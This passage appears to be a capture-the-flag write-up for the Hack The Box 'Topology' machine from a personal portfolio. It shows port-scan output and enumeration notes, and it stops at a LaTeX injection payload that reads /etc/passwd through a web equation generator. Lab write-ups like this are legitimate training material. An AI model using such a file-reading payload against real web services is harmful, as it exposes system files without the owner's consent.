Kshitij Raj Portfolio

1. Port Scanning

┌──(ezio㉿kali)-[~/htb/topology]
└─$ rustscan -a topology.htb -- -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \\ |  `| |
| .-. \\| {_} |.-._} } | |  .-._} }\\     }/  /\\  \\| |\\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: <http://discord.skerritt.blog>           :
: <https://github.com/RustScan/RustScan> :
 --------------------------------------
😵 <https://admin.tryhackme.com>

[~] The config file is expected to be at "/home/ezio/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.217:22
Open 10.10.11.217:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV" on ip 10.10.11.217
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( <https://nmap.org> ) at 2023-08-24 17:44 IST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
Initiating Ping Scan at 17:44
Scanning 10.10.11.217 [2 ports]
Completed Ping Scan at 17:44, 0.07s elapsed (1 total hosts)
Initiating Connect Scan at 17:44
Scanning topology.htb (10.10.11.217) [2 ports]
Discovered open port 22/tcp on 10.10.11.217
Discovered open port 80/tcp on 10.10.11.217
Completed Connect Scan at 17:44, 0.07s elapsed (2 total ports)
Initiating Service scan at 17:44
Scanning 2 services on topology.htb (10.10.11.217)
Completed Service scan at 17:45, 6.23s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.217.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 3.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.42s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
Nmap scan report for topology.htb (10.10.11.217)
Host is up, received syn-ack (0.072s latency).
Scanned at 2023-08-24 17:44:55 IST for 11s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC65qOGPSRC7ko+vPGrMrUKptY7vMtBZuaDUQTNURCs5lRBkCFZIrXTGf/Xmg9MYZTnwm+0dMjIZTUZnQvbj4kdsmzWUOxg5Leumcy+pR/AhBqLw2wyC4kcX+fr/1mcAgbqZnCczedIcQyjjO9M1BQqUMQ7+rHDpRBxV9+PeI9kmGyF6638DJP7P/R2h1N9MuAlVohfYtgIkEMpvfCUv5g/VIRV4atP9x+11FHKae5/xiK95hsIgKYCQtWXvV7oHLs3rB0M5fayka1vOGgn6/nzQ99pZUMmUxPUrjf4V3Pa1XWkS5TSv2krkLXNnxQHoZOMQNKGmDdk0M8UfuClEYiHt+zDDYWPI672OK/qRNI7azALWU9OfOzhK3WWLKXloUImRiM0lFvp4edffENyiAiu8sWHWTED0tdse2xg8OfZ6jpNVertFTTbnilwrh2P5oWq+iVWGL8yTFeXvaSK5fq9g9ohD8FerF2DjRbj0lVonsbtKS1F0uaDp/IEaedjAeE=
|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIR4Yogc3XXHR1rv03CD80VeuNTF/y2dQcRyZCo4Z3spJ0i+YJVQe/3nTxekStsHk8J8R28Y4CDP7h0h9vnlLWo=
|   256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaM68hPSVQXNWZbTV88LsN41odqyoxxgwKEb1SOPm5k
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:45
Completed NSE at 17:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 10.75 seconds

found two ports open

2. Enumeration

Found a website

Screenshot 2023-08-24 at 17.46.27.png

lets try gobuster here and look around what we get here , but not that interesting results.

Found a subdomain in source code let’s access that

Screenshot 2023-08-24 at 17.48.37.png

here is website in which we can generate equation using latex code

let’s try if we can exploit this or not,

payload $\\lstinputlisting{/etc/passwd}$